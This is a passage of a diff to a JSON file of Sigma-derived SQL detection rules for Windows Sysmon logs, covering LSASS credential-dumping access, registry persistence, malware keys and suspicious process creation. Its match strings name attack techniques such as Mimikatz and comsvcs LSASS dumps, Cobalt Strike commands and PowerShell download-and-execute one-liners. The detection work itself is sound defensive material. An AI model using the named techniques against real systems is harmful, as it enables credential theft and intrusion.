'\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) 
OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nimgrab.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", "status": "test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "author": 
"Sittikorn S", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "status": "experimental", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.credential_access", + "attack.t1003.001" ], 
"falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", - "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. 
This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "status": "test", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely, since these tools shouldn't access lsass.exe at all" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' 
ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", - "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "status": "stable", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 
'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "LittleCorporal Generated Maldoc Injection", + "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "status": "experimental", + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function 
from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + ], + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + }, + { + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_priv_discovery.yml" + "filename": 
"proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Suspicious Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. 
a renamed Sysinternals tool)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", - "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Potential Ursnif Malware Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", + "status": "test", + "description": "Detects registry keys related to Ursnif malware.", + "author": "megan201296", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE 
'%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects the execution of a renamed version of the Plink binary", + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate security products adding their own AMSI providers. 
Filter these according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "title": "Potential NetWire RAT Activity - Registry", + "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX ((New-Object 
Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "CobaltStrike Service Installations in Registry", + "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", "tags": [ + "attack.execution", "attack.privilege_escalation", - "attack.t1068" 
+ "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" ], "level": "high", "rule": [ - "SELECT * 
